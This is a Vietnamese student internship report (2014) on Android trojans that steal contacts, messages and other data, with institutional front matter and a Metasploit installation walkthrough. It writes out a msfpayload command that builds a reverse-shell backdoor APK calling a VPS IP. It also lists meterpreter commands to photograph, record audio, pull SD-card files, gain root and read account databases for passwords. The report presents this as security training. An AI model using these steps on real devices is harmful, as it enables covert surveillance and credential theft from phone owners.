Báo cáo đề tài thực tập CNTT nghiên cứu các trojan, malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điên thoại sử dụng android và gửi ra ngoài
ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC BÁCH KHOA KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT Nghiên cứu Trojan, Malware cho phép đánh cắp liệu danh sách contact, tin nhắn điên thoại sử dụng Android gửi GVHD: Thầy VÕ ĐỖ THẮNG SVTH: Lê Công Hậu MSSV: 51101058 TPHCM, ngày 28 tháng 07 năm 2014 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI CAM ĐOAN Tơi xin cam đoan: • Những nội dung báo cáo thực hướng dẫn trực tiếp thầy Võ Đỗ Thắng • Mọi tham khảo dùng báo cáo trích dẫn rõ ràng tên tác giả, tên cơng trình, thời gian, địa điểm cơng bố • Mọi chép khơng hợp lệ, vi phạm quy chế đào tạo, hay gian lận, tơi xin chịu hồn tồn trách nhiệm TPHCM, ngày 28 tháng 07 năm 2014 Sinh viên thực tập Lê Công Hậu LỜI CẢM ƠN KHOA KH & KT MÁY TÍNH, ĐH BK SVTH: Lê Cơng Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng TPHCM Tôi xin chân thành cảm ơn trường Đại Học Bách Khoa TPHCM khoa Khoa Học Kỹ Thuật Máy Tính tạo điều kiện cho tơi hồn thành tốt đợt TTCN Trong đợt thực tập cho kinh nghiệm quý báu Những kinh nghiệm giúp tơi hồn thiện cơng việc môi trường làm việc sau Mặc dù cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất nỗ lực thân Nhưng trình độ hiểu biết kinh nghiệm thực tế có hạn nên chắn khơng thể tránh khỏi thiếu sót định Tơi mong nhận đóng góp, chia sẻ để tơi làm tốt Một lần xin chân thành cảm ơn TPHCM, ngày 28 tháng 07 năm 2014 Sinh viên thực tập Lê Công Hậu LỜI CẢM ƠN TRUNG TÂM ATHENA SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Tôi xin cảm ơn giám đốc Công Ty Quản Trị An Ninh Mạng Quốc Tế Athena, anh chị công ty Đặc biệt, xin chân thành cảm ơn thầy Đỗ Võ Thắng nhiệt tình giúp đỡ hướng dẫn suốt thời gian thực tập công ty Thầy tạo điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết đóng góp ý kiến q báu để hồn thành tốt báo cáo Mặc dù cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất nỗ lực thân Nhưng trình độ hiểu biết kinh nghiệm thực tế có hạn nên chắn khơng thể tránh khỏi thiếu sót định Tơi mong nhận đóng góp, chia sẻ để tơi làm tốt Một lần xin chân thành cảm ơn TPHCM, ngày 28 tháng 07 năm 2014 Sinh viên thực tập Lê Công Hậu SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI MỞ ĐẦU Trong năm gần đây, vấn đề “An tồn bảo mật thơng tin” ngày nóng Với phát triển đến chóng mặt tảng di động iOS, Android, Windows Phone với nhiều dịng điện thoại thơng minh, vấn đề bảo mật thông tin chuyển dần xu hướng từ PC sang mobile Nếu bạn sở hữu smartphone Apple, Google Nexus, Samsung, Nokia, HTC, liệu bạn có dám “dế cưng” khơng bị nhiễm phần mềm gián điệp, nghe khơng? Vì lại vậy? Vì theo báo cáo gần hãng phần mềm bảo mật Kaspersky Lab, Norton AV, Avast hay BKAV số lượng smartphone bị nhiễm mã độc ngày tăng Đặc biệt HĐH Android HĐH phát triển nhanh năm gần lại mảnh đất béo bở cho Hacker công Với nhẹ tin, thiếu hiểu biết người dùng, lòng tham các thứ “Free” free app, free wifi vơ tình tiếp tay cho Hacker xâm nhập cài đặt mã độc điện thoại bạn Hơm viết báo cáo đề tài “Nghiên cứu trojan, malware cho phép đánh cắp liệu danh sách contact, tin nhắn điện thoại Android gửi ngồi” để nghiên cứu, tìm hiểu cách thức hoạt động, chia sẻ thông tin cung cấp giải pháp để phịng tránh SVTH: Lê Cơng Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng NHẬN XÉT CỦA KHOA TPHCM, ngày tháng năm 2014 Trưởng Khoa SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng NHẬN XÉT CỦA CÔNG TY THỰC TẬP TPHCM, ngày tháng năm 2014 Giám đốc SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN TPHCM, ngày tháng năm 2014 Giáo viên hướng dẫn SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng MỤC LỤC CHUNG VỀ CÔNG TY THỰC TẬP Cơ sở 1_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA Số Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99 Cơ sở 2_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam Website: www.athena.edu.vn or www.athena.com.vn Điện thoại: (84-8) 2210 3801 Hotline: 0943 20 00 88 - Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA thành lập từ năm 2004, tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy động, nhiệt huyết kinh nghiệm lãnh vực CNTT, với tâm huyết góp phần vào cơng thúc đẩy tiến trình đưa cơng nghệ thơng tin ngành kinh tế mũi nhọn, góp phần phát triển nước nhà Lĩnh vực hoạt động: Trung tâm ATHENA tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo tiêu chuẩn quốc tế hãng tiếng Microsoft, Cisco, Oracle, Linux LPI, CEH Song song đó, trung tâm ATHENA cịn có chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng đơn vị SVTH: Lê Công Hậu 51101058 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Bộ Quốc Phịng, Bộ Cơng An, ngân hàng, doanh nghiệp, quan phủ, tổ chức tài chính… Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều ngành Cục Công Nghệ Thơng Tin - Bộ Quốc Phịng , Bộ Cơng An, Sở Thông Tin Truyền Thông tỉnh, bưu điện tỉnh,… Ngồi chương trình đào tạo, Trung tâm ATHENA cịn có nhiều chương trình hợp tác trao đổi công nghệ với nhiều đại học lớn đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thơng, Hiệp hội an tồn thơng tin (VNISA), Viện Kỹ Thuật Quân Sự… - Đội ngũ giảng viên: Tất giảng viên trung tâm ATHENA có tốt nghiệp từ trường đại học hàng đầu nước Tất giảng viên ATHENA phải có chứng quốc tế MCSA, MCSE, CCNA, CCNP, Security+, CEH,có sư phạm Quốc tế (Microsoft Certified Trainer) Đây chứng chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy trung tâm ATHENA Bên cạnh đó, giảng viên ATHENA thường tu nghiệp cập nhật kiến thức công nghệ từ nước tiên tiến Mỹ , Pháp, Hà Lan, Singapore, truyền đạt công nghệ chương trình đào tạo trung tâm ATHENA SVTH: Lê Công Hậu 51101058 Trang 10 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Chọn folder cài đặt: Cổng dịch vụ Metasploit sử dụng, mặc định 3790: Chọn server ngày hết hạn, để mặc định: SVTH: Lê Công Hậu 51101058 Trang 49 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Quá trình cài đặt Metasploit: Tiến trình hồn tất, chọn Finish truy cập đến giao diện web chương trình: SVTH: Lê Công Hậu 51101058 Trang 50 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Sau Finish trình duyệt web mở lên tới giao diện Click vào link: https://localhost:3790/ dẫn đến trang tạo tài khoản để login vào Metasploit Điền Username, Password sử dụng số thông tin bổ xung, chọn Create Account: SVTH: Lê Công Hậu 51101058 Trang 51 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Trình duyệt chuyển đến trang nhập key để active chương trình, key gửi miễn phí đến mail tải phần mềm Sau điền key nhấn Activate License: Giao diện chương trình Metasploit Console SVTH: Lê Công Hậu 51101058 Trang 52 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 53 Báo cáo thực tập 2.2.3 GVHD: Thầy Võ Đỗ Thắng Từ VPS xâm nhập vào thiết bị Android: Các bước thực Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android mang LAN với địa IP địa VPS Chúng ta sử dụng lệnh msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk Ở địa VPS 14.0.21.132 Khởi động Metasploit Console VPS Chúng ta thực bước xâm nhập đề cập phần trên, khác sử dụng IP VPS SVTH: Lê Công Hậu 51101058 Trang 54 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Sau máy nạn nhân tải file apk tạo ra, máy android bị hack Sử dụng lệnh Help để xem lệnh metasploit hỗ trợ SVTH: Lê Công Hậu 51101058 Trang 55 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Để xem thông tin máy, nhập lệnh sysinfo Để xem tác vụ chạy gõ ps Xem ip gõ ifconfig Xem danh sách thư mục, file gõ ls Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình camera, nhập webcam_snap x với x id camera xem danh sách camera phần trước máy Ghi âm Để thực ghi âm, nhập lênh record_mic file ghi âm lưu SVTH: Lê Công Hậu 51101058 Trang 56 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Lấy file từ sd card Để vào sdcard, nhập lệnh: cd /sdcard lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục Để tải máy, ta nhập lệnh Download App.apk Để upload gõ lệnh upload Và file tải thư mục root máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami Nếu báo unknown id is tức root ls -l danh mục file quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk thay đổi quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách down load file hay thay đổi file ROM phải gõ lệnh SU để có tồn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data Ctrl + C để quay lại Sử dụng SQLite để mở file db SVTH: Lê Công Hậu 51101058 Trang 57 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng KẾT QUẢ ĐẠT ĐƯỢC Những kiến thức lý thuyết củng cố: • • • • Tìm hiểu lịch sử, trình phát triển hệ điều hành Android Tìm hiểu hệ điều hành Kali Linux Tìm hiểu lỗ hổng bảo mật Windows Android Tìm hiểu cách sửa đổi file APK thực Signing ứng dụng Những kỹ thực hành học thêm: Thực cài đặt Android máy ảo Cài đặt Kali Linux, sử dụng để hack vào lỗ hổng bảo mật Windows Android • Thi lấy chứng System Hacking trung tâm Athena • Thực sửa đổi, tạo file Trojan, Backdoor sau cài đặt vào Android • Biết thêm số học lớp Hacker mũ trắng • • Những kinh nghiệm thực tiễn tích lũy được: Qua gần tháng thực tập, thân em đúc kết nhiều kinh nghiệm quý báu, thứ kĩ chuyên môn, em học cố kiến thức bên cạnh kiến thức tảng Hơn q trình thực tập môi trường doanh nghiệp cho em làm quen dần để khơng bỡ ngỡ q trình làm sau này, thông qua kĩ giao tiếp ứng xử SVTH: Lê Công Hậu 51101058 Trang 58 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng KẾT LUẬN QUÁ TRÌNH THỰC TẬP SVTH: Lê Công Hậu 51101058 Trang 59 ... mã độc điện thoại bạn Hơm viết báo cáo đề tài ? ?Nghiên cứu trojan, malware cho phép đánh cắp liệu danh sách contact, tin nhắn điện thoại Android gửi ngồi” để nghiên cứu, tìm hiểu cách thức hoạt... mail cho bạn Attached File (tập tin exe) cho biết file hỗ trợ sử dụng Internet thực chất file ăn cắp password Lợi dụng tin tưởng mượn sửa chữa máy tính bạn họ dễ dàng lấy mật đa số người sử dụng. .. bàn phím bạn sử dụng SVTH: Lê Công Hậu 51101058 Trang 19 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Hình 2.1.9 Configure the keyboard SVTH: Lê Công Hậu 51101058 Trang 20 Báo cáo thực tập GVHD: Thầy